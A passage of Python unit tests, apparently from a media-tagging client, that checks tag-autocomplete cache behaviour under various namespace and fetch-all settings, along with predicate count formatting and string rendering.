self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus_ar, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus_ar, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus_br, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus_br, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_metroid, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_metroid, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_series_samus, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_series_samus, False ), False )
#
search_namespaces_into_full_tags = False
namespace_bare_fetch_all_allowed = False
namespace_fetch_all_allowed = True
fetch_all_allowed = False
tag_autocomplete_options.SetTuple(
tag_autocomplete_options.GetWriteAutocompleteTagDomain(),
tag_autocomplete_options.OverridesWriteAutocompleteFileDomain(),
tag_autocomplete_options.GetWriteAutocompleteFileDomain(),
search_namespaces_into_full_tags,
namespace_bare_fetch_all_allowed,
namespace_fetch_all_allowed,
fetch_all_allowed
)
pat_empty = ClientSearch.ParsedAutocompleteText( '', tag_autocomplete_options, True )
pat_samus = ClientSearch.ParsedAutocompleteText( 'samus', tag_autocomplete_options, True )
pat_samus_ar = ClientSearch.ParsedAutocompleteText( 'samus ar', tag_autocomplete_options, True )
pat_samus_br = ClientSearch.ParsedAutocompleteText( 'samus br', tag_autocomplete_options, True )
pat_character_samus = ClientSearch.ParsedAutocompleteText( 'character:samus', tag_autocomplete_options, True )
pat_character_samus_ar = ClientSearch.ParsedAutocompleteText( 'character:samus ar', tag_autocomplete_options, True )
pat_character_samus_br = ClientSearch.ParsedAutocompleteText( 'character:samus br', tag_autocomplete_options, True )
pat_metroid = ClientSearch.ParsedAutocompleteText( 'metroid', tag_autocomplete_options, True )
pat_series_samus = ClientSearch.ParsedAutocompleteText( 'series:samus', tag_autocomplete_options, True )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_empty, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_empty, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_samus, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_samus, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_samus_ar, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_samus_ar, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus, True ), True )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus, False ), True )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus_ar, True ), True )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus_ar, False ), True )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus_br, True ), True )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus_br, False ), True )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_metroid, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_metroid, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_series_samus, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_series_samus, False ), False )
self.assertEqual( set( predicate_results_cache.FilterPredicates( CC.COMBINED_TAG_SERVICE_KEY, 'character:samus' ) ), { character_samus_aran } )
self.assertEqual( set( predicate_results_cache.FilterPredicates( CC.COMBINED_TAG_SERVICE_KEY, 'character:samus*' ) ), { character_samus_aran } )
self.assertEqual( set( predicate_results_cache.FilterPredicates( CC.COMBINED_TAG_SERVICE_KEY, 'character:samus ar*' ) ), { character_samus_aran } )
self.assertEqual( set( predicate_results_cache.FilterPredicates( CC.COMBINED_TAG_SERVICE_KEY, 'character:samus br*' ) ), set() )
self.assertEqual( set( predicate_results_cache.FilterPredicates( CC.COMBINED_TAG_SERVICE_KEY, 'character:samus aran*' ) ), { character_samus_aran } )
def test_predicate_results_cache_namespace_bare_fetch_all( self ):
tag_autocomplete_options = ClientTagsHandling.TagAutocompleteOptions( CC.COMBINED_TAG_SERVICE_KEY )
search_namespaces_into_full_tags = False
namespace_bare_fetch_all_allowed = False
namespace_fetch_all_allowed = False
fetch_all_allowed = False
tag_autocomplete_options.SetTuple(
tag_autocomplete_options.GetWriteAutocompleteTagDomain(),
tag_autocomplete_options.OverridesWriteAutocompleteFileDomain(),
tag_autocomplete_options.GetWriteAutocompleteFileDomain(),
search_namespaces_into_full_tags,
namespace_bare_fetch_all_allowed,
namespace_fetch_all_allowed,
fetch_all_allowed
)
pat_empty = ClientSearch.ParsedAutocompleteText( '', tag_autocomplete_options, True )
pat_samus = ClientSearch.ParsedAutocompleteText( 'samus', tag_autocomplete_options, True )
pat_samus_ar = ClientSearch.ParsedAutocompleteText( 'samus ar', tag_autocomplete_options, True )
pat_samus_br = ClientSearch.ParsedAutocompleteText( 'samus br', tag_autocomplete_options, True )
pat_character_samus = ClientSearch.ParsedAutocompleteText( 'character:samus', tag_autocomplete_options, True )
pat_character_samus_ar = ClientSearch.ParsedAutocompleteText( 'character:samus ar', tag_autocomplete_options, True )
pat_character_samus_br = ClientSearch.ParsedAutocompleteText( 'character:samus br', tag_autocomplete_options, True )
pat_metroid = ClientSearch.ParsedAutocompleteText( 'metroid', tag_autocomplete_options, True )
pat_series_samus = ClientSearch.ParsedAutocompleteText( 'series:samus', tag_autocomplete_options, True )
samus = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_TAG, 'samus' )
samus_aran = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_TAG, 'samus aran' )
character_samus_aran = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_TAG, 'character:samus aran' )
predicates = [ character_samus_aran ]
predicate_results_cache = ClientSearch.PredicateResultsCacheTag( predicates, 'character:', False )
self.assertEqual( predicate_results_cache.GetPredicates(), predicates )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_empty, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_empty, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_samus, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_samus, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_samus_ar, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_samus_ar, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus_ar, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus_ar, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus_br, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus_br, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_metroid, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_metroid, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_series_samus, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_series_samus, False ), False )
#
search_namespaces_into_full_tags = False
namespace_bare_fetch_all_allowed = True
namespace_fetch_all_allowed = True
fetch_all_allowed = False
tag_autocomplete_options.SetTuple(
tag_autocomplete_options.GetWriteAutocompleteTagDomain(),
tag_autocomplete_options.OverridesWriteAutocompleteFileDomain(),
tag_autocomplete_options.GetWriteAutocompleteFileDomain(),
search_namespaces_into_full_tags,
namespace_bare_fetch_all_allowed,
namespace_fetch_all_allowed,
fetch_all_allowed
)
pat_empty = ClientSearch.ParsedAutocompleteText( '', tag_autocomplete_options, True )
pat_samus = ClientSearch.ParsedAutocompleteText( 'samus', tag_autocomplete_options, True )
pat_samus_ar = ClientSearch.ParsedAutocompleteText( 'samus ar', tag_autocomplete_options, True )
pat_samus_br = ClientSearch.ParsedAutocompleteText( 'samus br', tag_autocomplete_options, True )
pat_character_samus = ClientSearch.ParsedAutocompleteText( 'character:samus', tag_autocomplete_options, True )
pat_character_samus_ar = ClientSearch.ParsedAutocompleteText( 'character:samus ar', tag_autocomplete_options, True )
pat_character_samus_br = ClientSearch.ParsedAutocompleteText( 'character:samus br', tag_autocomplete_options, True )
pat_metroid = ClientSearch.ParsedAutocompleteText( 'metroid', tag_autocomplete_options, True )
pat_series_samus = ClientSearch.ParsedAutocompleteText( 'series:samus', tag_autocomplete_options, True )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_empty, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_empty, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_samus, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_samus, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_samus_ar, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_samus_ar, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus, True ), True )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus, False ), True )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus_ar, True ), True )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus_ar, False ), True )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus_br, True ), True )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus_br, False ), True )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_metroid, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_metroid, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_series_samus, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_series_samus, False ), False )
self.assertEqual( set( predicate_results_cache.FilterPredicates( CC.COMBINED_TAG_SERVICE_KEY, 'character:samus' ) ), { character_samus_aran } )
self.assertEqual( set( predicate_results_cache.FilterPredicates( CC.COMBINED_TAG_SERVICE_KEY, 'character:samus*' ) ), { character_samus_aran } )
self.assertEqual( set( predicate_results_cache.FilterPredicates( CC.COMBINED_TAG_SERVICE_KEY, 'character:samus ar*' ) ), { character_samus_aran } )
self.assertEqual( set( predicate_results_cache.FilterPredicates( CC.COMBINED_TAG_SERVICE_KEY, 'character:samus br*' ) ), set() )
self.assertEqual( set( predicate_results_cache.FilterPredicates( CC.COMBINED_TAG_SERVICE_KEY, 'character:samus aran*' ) ), { character_samus_aran } )
def test_predicate_results_cache_namespaces_into_full_tags( self ):
tag_autocomplete_options = ClientTagsHandling.TagAutocompleteOptions( CC.COMBINED_TAG_SERVICE_KEY )
search_namespaces_into_full_tags = False
namespace_bare_fetch_all_allowed = False
namespace_fetch_all_allowed = False
fetch_all_allowed = False
tag_autocomplete_options.SetTuple(
tag_autocomplete_options.GetWriteAutocompleteTagDomain(),
tag_autocomplete_options.OverridesWriteAutocompleteFileDomain(),
tag_autocomplete_options.GetWriteAutocompleteFileDomain(),
search_namespaces_into_full_tags,
namespace_bare_fetch_all_allowed,
namespace_fetch_all_allowed,
fetch_all_allowed
)
pat_empty = ClientSearch.ParsedAutocompleteText( '', tag_autocomplete_options, True )
pat_samus = ClientSearch.ParsedAutocompleteText( 'samus', tag_autocomplete_options, True )
pat_samus_ar = ClientSearch.ParsedAutocompleteText( 'samus ar', tag_autocomplete_options, True )
pat_samus_br = ClientSearch.ParsedAutocompleteText( 'samus br', tag_autocomplete_options, True )
pat_character_samus = ClientSearch.ParsedAutocompleteText( 'character:samus', tag_autocomplete_options, True )
pat_character_samus_ar = ClientSearch.ParsedAutocompleteText( 'character:samus ar', tag_autocomplete_options, True )
pat_character_samus_br = ClientSearch.ParsedAutocompleteText( 'character:samus br', tag_autocomplete_options, True )
pat_metroid = ClientSearch.ParsedAutocompleteText( 'metroid', tag_autocomplete_options, True )
pat_series_samus = ClientSearch.ParsedAutocompleteText( 'series:samus', tag_autocomplete_options, True )
samus = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_TAG, 'samus' )
samus_aran = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_TAG, 'samus aran' )
character_samus_aran = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_TAG, 'character:samus aran' )
predicates = [ character_samus_aran ]
predicate_results_cache = ClientSearch.PredicateResultsCacheTag( predicates, 'char', False )
self.assertEqual( predicate_results_cache.GetPredicates(), predicates )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_empty, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_empty, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_samus, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_samus, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_samus_ar, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_samus_ar, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus_ar, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus_ar, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus_br, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus_br, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_metroid, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_metroid, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_series_samus, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_series_samus, False ), False )
#
search_namespaces_into_full_tags = True
namespace_bare_fetch_all_allowed = True
namespace_fetch_all_allowed = True
fetch_all_allowed = False
tag_autocomplete_options.SetTuple(
tag_autocomplete_options.GetWriteAutocompleteTagDomain(),
tag_autocomplete_options.OverridesWriteAutocompleteFileDomain(),
tag_autocomplete_options.GetWriteAutocompleteFileDomain(),
search_namespaces_into_full_tags,
namespace_bare_fetch_all_allowed,
namespace_fetch_all_allowed,
fetch_all_allowed
)
pat_empty = ClientSearch.ParsedAutocompleteText( '', tag_autocomplete_options, True )
pat_samus = ClientSearch.ParsedAutocompleteText( 'samus', tag_autocomplete_options, True )
pat_samus_ar = ClientSearch.ParsedAutocompleteText( 'samus ar', tag_autocomplete_options, True )
pat_samus_br = ClientSearch.ParsedAutocompleteText( 'samus br', tag_autocomplete_options, True )
pat_character_samus = ClientSearch.ParsedAutocompleteText( 'character:samus', tag_autocomplete_options, True )
pat_character_samus_ar = ClientSearch.ParsedAutocompleteText( 'character:samus ar', tag_autocomplete_options, True )
pat_character_samus_br = ClientSearch.ParsedAutocompleteText( 'character:samus br', tag_autocomplete_options, True )
pat_metroid = ClientSearch.ParsedAutocompleteText( 'metroid', tag_autocomplete_options, True )
pat_series_samus = ClientSearch.ParsedAutocompleteText( 'series:samus', tag_autocomplete_options, True )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_empty, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_empty, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_samus, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_samus, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_samus_ar, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_samus_ar, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus, True ), True )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus, False ), True )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus_ar, True ), True )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus_ar, False ), True )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus_br, True ), True )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus_br, False ), True )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_metroid, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_metroid, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_series_samus, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_series_samus, False ), False )
self.assertEqual( set( predicate_results_cache.FilterPredicates( CC.COMBINED_TAG_SERVICE_KEY, 'character:samus' ) ), { character_samus_aran } )
self.assertEqual( set( predicate_results_cache.FilterPredicates( CC.COMBINED_TAG_SERVICE_KEY, 'character:samus*' ) ), { character_samus_aran } )
self.assertEqual( set( predicate_results_cache.FilterPredicates( CC.COMBINED_TAG_SERVICE_KEY, 'character:samus ar*' ) ), { character_samus_aran } )
self.assertEqual( set( predicate_results_cache.FilterPredicates( CC.COMBINED_TAG_SERVICE_KEY, 'character:samus br*' ) ), set() )
self.assertEqual( set( predicate_results_cache.FilterPredicates( CC.COMBINED_TAG_SERVICE_KEY, 'character:samus aran*' ) ), { character_samus_aran } )
def test_predicate_results_cache_fetch_all_madness( self ):
tag_autocomplete_options = ClientTagsHandling.TagAutocompleteOptions( CC.COMBINED_TAG_SERVICE_KEY )
search_namespaces_into_full_tags = False
namespace_bare_fetch_all_allowed = False
namespace_fetch_all_allowed = False
fetch_all_allowed = False
tag_autocomplete_options.SetTuple(
tag_autocomplete_options.GetWriteAutocompleteTagDomain(),
tag_autocomplete_options.OverridesWriteAutocompleteFileDomain(),
tag_autocomplete_options.GetWriteAutocompleteFileDomain(),
search_namespaces_into_full_tags,
namespace_bare_fetch_all_allowed,
namespace_fetch_all_allowed,
fetch_all_allowed
)
pat_empty = ClientSearch.ParsedAutocompleteText( '', tag_autocomplete_options, True )
pat_samus = ClientSearch.ParsedAutocompleteText( 'samus', tag_autocomplete_options, True )
pat_samus_ar = ClientSearch.ParsedAutocompleteText( 'samus ar', tag_autocomplete_options, True )
pat_samus_br = ClientSearch.ParsedAutocompleteText( 'samus br', tag_autocomplete_options, True )
pat_character_samus = ClientSearch.ParsedAutocompleteText( 'character:samus', tag_autocomplete_options, True )
pat_character_samus_ar = ClientSearch.ParsedAutocompleteText( 'character:samus ar', tag_autocomplete_options, True )
pat_character_samus_br = ClientSearch.ParsedAutocompleteText( 'character:samus br', tag_autocomplete_options, True )
pat_metroid = ClientSearch.ParsedAutocompleteText( 'metroid', tag_autocomplete_options, True )
pat_series_samus = ClientSearch.ParsedAutocompleteText( 'series:samus', tag_autocomplete_options, True )
samus = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_TAG, 'samus' )
samus_aran = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_TAG, 'samus aran' )
character_samus_aran = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_TAG, 'character:samus aran' )
predicates = [ samus, samus_aran, character_samus_aran ]
predicate_results_cache = ClientSearch.PredicateResultsCacheTag( predicates, '*', False )
self.assertEqual( predicate_results_cache.GetPredicates(), predicates )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_empty, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_empty, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_samus, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_samus, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_samus_ar, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_samus_ar, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus_ar, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus_ar, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus_br, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus_br, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_metroid, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_metroid, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_series_samus, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_series_samus, False ), False )
#
search_namespaces_into_full_tags = True
namespace_bare_fetch_all_allowed = True
namespace_fetch_all_allowed = True
fetch_all_allowed = True
tag_autocomplete_options.SetTuple(
tag_autocomplete_options.GetWriteAutocompleteTagDomain(),
tag_autocomplete_options.OverridesWriteAutocompleteFileDomain(),
tag_autocomplete_options.GetWriteAutocompleteFileDomain(),
search_namespaces_into_full_tags,
namespace_bare_fetch_all_allowed,
namespace_fetch_all_allowed,
fetch_all_allowed
)
pat_empty = ClientSearch.ParsedAutocompleteText( '', tag_autocomplete_options, True )
pat_samus = ClientSearch.ParsedAutocompleteText( 'samus', tag_autocomplete_options, True )
pat_samus_ar = ClientSearch.ParsedAutocompleteText( 'samus ar', tag_autocomplete_options, True )
pat_samus_br = ClientSearch.ParsedAutocompleteText( 'samus br', tag_autocomplete_options, True )
pat_character_samus = ClientSearch.ParsedAutocompleteText( 'character:samus', tag_autocomplete_options, True )
pat_character_samus_ar = ClientSearch.ParsedAutocompleteText( 'character:samus ar', tag_autocomplete_options, True )
pat_character_samus_br = ClientSearch.ParsedAutocompleteText( 'character:samus br', tag_autocomplete_options, True )
pat_metroid = ClientSearch.ParsedAutocompleteText( 'metroid', tag_autocomplete_options, True )
pat_series_samus = ClientSearch.ParsedAutocompleteText( 'series:samus', tag_autocomplete_options, True )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_empty, True ), True )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_empty, False ), True )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_samus, True ), True )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_samus, False ), True )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_samus_ar, True ), True )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_samus_ar, False ), True )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus, True ), True )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus, False ), True )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus_ar, True ), True )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus_ar, False ), True )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus_br, True ), True )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus_br, False ), True )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_metroid, True ), True )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_metroid, False ), True )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_series_samus, True ), True )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_series_samus, False ), True )
self.assertEqual( set( predicate_results_cache.FilterPredicates( CC.COMBINED_TAG_SERVICE_KEY, 'character:samus' ) ), { character_samus_aran } )
self.assertEqual( set( predicate_results_cache.FilterPredicates( CC.COMBINED_TAG_SERVICE_KEY, 'character:samus*' ) ), { character_samus_aran } )
self.assertEqual( set( predicate_results_cache.FilterPredicates( CC.COMBINED_TAG_SERVICE_KEY, 'character:samus ar*' ) ), { character_samus_aran } )
self.assertEqual( set( predicate_results_cache.FilterPredicates( CC.COMBINED_TAG_SERVICE_KEY, 'character:samus br*' ) ), set() )
self.assertEqual( set( predicate_results_cache.FilterPredicates( CC.COMBINED_TAG_SERVICE_KEY, 'character:samus aran*' ) ), { character_samus_aran } )
self.assertEqual( set( predicate_results_cache.FilterPredicates( CC.COMBINED_TAG_SERVICE_KEY, 'samus' ) ), { samus, samus_aran, character_samus_aran } )
self.assertEqual( set( predicate_results_cache.FilterPredicates( CC.COMBINED_TAG_SERVICE_KEY, 'samus*' ) ), { samus, samus_aran, character_samus_aran } )
self.assertEqual( set( predicate_results_cache.FilterPredicates( CC.COMBINED_TAG_SERVICE_KEY, 'samas br*' ) ), set() )
self.assertEqual( set( predicate_results_cache.FilterPredicates( CC.COMBINED_TAG_SERVICE_KEY, 'samus ar*' ) ), { samus_aran, character_samus_aran } )
self.assertEqual( set( predicate_results_cache.FilterPredicates( CC.COMBINED_TAG_SERVICE_KEY, 'samus aran*' ) ), { samus_aran, character_samus_aran } )
def test_predicate_counts( self ):
# quick test for counts and __hash__
p_c = ClientSearch.PredicateCount( 1, 2, 3, 4 )
self.assertEqual( p_c.min_current_count, 1 )
self.assertEqual( p_c.min_pending_count, 2 )
self.assertEqual( p_c.max_current_count, 3 )
self.assertEqual( p_c.max_pending_count, 4 )
self.assertNotEqual( p_c, ClientSearch.PredicateCount( 1, 2, 3, 5 ) )
self.assertNotEqual( p_c, ClientSearch.PredicateCount( 1, 5, 3, 4 ) )
self.assertEqual( p_c, ClientSearch.PredicateCount( 1, 2, 3, 4 ) )
#
null = ClientSearch.PredicateCount.STATICCreateNullCount()
self.assertEqual( null, ClientSearch.PredicateCount( 0, 0, 0, 0 ) )
self.assertEqual( null.GetMinCount(), 0 )
self.assertEqual( null.GetMinCount( HC.CONTENT_STATUS_CURRENT ), 0 )
self.assertEqual( null.GetMinCount( HC.CONTENT_STATUS_PENDING ), 0 )
self.assertEqual( null.HasZeroCount(), True )
self.assertEqual( null.HasNonZeroCount(), False )
self.assertEqual( null.GetSuffixString(), '' )
#
p_c = ClientSearch.PredicateCount( 3, 0, 3, 0 )
self.assertEqual( p_c, ClientSearch.PredicateCount( 3, 0, 3, 0 ) )
self.assertEqual( p_c.GetMinCount(), 3 )
self.assertEqual( p_c.GetMinCount( HC.CONTENT_STATUS_CURRENT ), 3 )
self.assertEqual( p_c.GetMinCount( HC.CONTENT_STATUS_PENDING ), 0 )
self.assertEqual( p_c.HasZeroCount(), False )
self.assertEqual( p_c.HasNonZeroCount(), True )
self.assertEqual( p_c.GetSuffixString(), '(3)' )
#
p_c = ClientSearch.PredicateCount( 0, 5, 0, 5 )
self.assertEqual( p_c, ClientSearch.PredicateCount( 0, 5, 0, 5 ) )
self.assertEqual( p_c.GetMinCount(), 5 )
self.assertEqual( p_c.GetMinCount( HC.CONTENT_STATUS_CURRENT ), 0 )
self.assertEqual( p_c.GetMinCount( HC.CONTENT_STATUS_PENDING ), 5 )
self.assertEqual( p_c.HasZeroCount(), False )
self.assertEqual( p_c.HasNonZeroCount(), True )
self.assertEqual( p_c.GetSuffixString(), '(+5)' )
#
p_c = ClientSearch.PredicateCount( 100, 0, 150, 0 )
self.assertEqual( p_c, ClientSearch.PredicateCount( 100, 0, 150, 0 ) )
self.assertEqual( p_c.GetMinCount(), 100 )
self.assertEqual( p_c.GetMinCount( HC.CONTENT_STATUS_CURRENT ), 100 )
self.assertEqual( p_c.GetMinCount( HC.CONTENT_STATUS_PENDING ), 0 )
self.assertEqual( p_c.HasZeroCount(), False )
self.assertEqual( p_c.HasNonZeroCount(), True )
self.assertEqual( p_c.GetSuffixString(), '(100-150)' )
#
p_c = ClientSearch.PredicateCount( 0, 80, 0, 85 )
self.assertEqual( p_c, ClientSearch.PredicateCount( 0, 80, 0, 85 ) )
self.assertEqual( p_c.GetMinCount(), 80 )
self.assertEqual( p_c.GetMinCount( HC.CONTENT_STATUS_CURRENT ), 0 )
self.assertEqual( p_c.GetMinCount( HC.CONTENT_STATUS_PENDING ), 80 )
self.assertEqual( p_c.HasZeroCount(), False )
self.assertEqual( p_c.HasNonZeroCount(), True )
self.assertEqual( p_c.GetSuffixString(), '(+80-85)' )
#
p_c = ClientSearch.PredicateCount( 0, 0, 1500, 0 )
self.assertEqual( p_c, ClientSearch.PredicateCount( 0, 0, 1500, 0 ) )
self.assertEqual( p_c.GetMinCount(), 0 )
self.assertEqual( p_c.GetMinCount( HC.CONTENT_STATUS_CURRENT ), 0 )
self.assertEqual( p_c.GetMinCount( HC.CONTENT_STATUS_PENDING ), 0 )
self.assertEqual( p_c.HasZeroCount(), False )
self.assertEqual( p_c.HasNonZeroCount(), True )
self.assertEqual( p_c.GetSuffixString(), '(0-1,500)' )
#
p_c = ClientSearch.PredicateCount( 1, 2, 3, 4 )
self.assertEqual( p_c, ClientSearch.PredicateCount( 1, 2, 3, 4 ) )
self.assertEqual( p_c.GetMinCount(), 3 )
self.assertEqual( p_c.GetMinCount( HC.CONTENT_STATUS_CURRENT ), 1 )
self.assertEqual( p_c.GetMinCount( HC.CONTENT_STATUS_PENDING ), 2 )
self.assertEqual( p_c.HasZeroCount(), False )
self.assertEqual( p_c.HasNonZeroCount(), True )
self.assertEqual( p_c.GetSuffixString(), '(1-3) (+2-4)' )
#
p_c_1 = ClientSearch.PredicateCount( 10, 2, 12, 4 )
p_c_2 = ClientSearch.PredicateCount( 1, 0, 2, 4 )
p_c_1.AddCounts( p_c_2 )
self.assertEqual( p_c_1, ClientSearch.PredicateCount( 10, 2, 14, 8 ) )
def test_predicate_strings_and_namespaces( self ):
render_for_user = False
p = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_TAG, 'tag' )
self.assertEqual( p.ToString(), 'tag' )
self.assertEqual( p.GetNamespace(), '' )
self.assertEqual( p.GetTextsAndNamespaces( render_for_user ), [ ( p.ToString(), p.GetNamespace() ) ] )
p = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_TAG, 'tag', True, count = ClientSearch.PredicateCount.STATICCreateStaticCount( 1, 2 ) )
self.assertEqual( p.ToString( with_count = False ), 'tag' )
self.assertEqual( p.ToString( with_count = True ), 'tag (1) (+2)' )
self.assertEqual( p.GetNamespace(), '' )
self.assertEqual( p.GetTextsAndNamespaces( render_for_user ), [ ( p.ToString(), p.GetNamespace() ) ] )
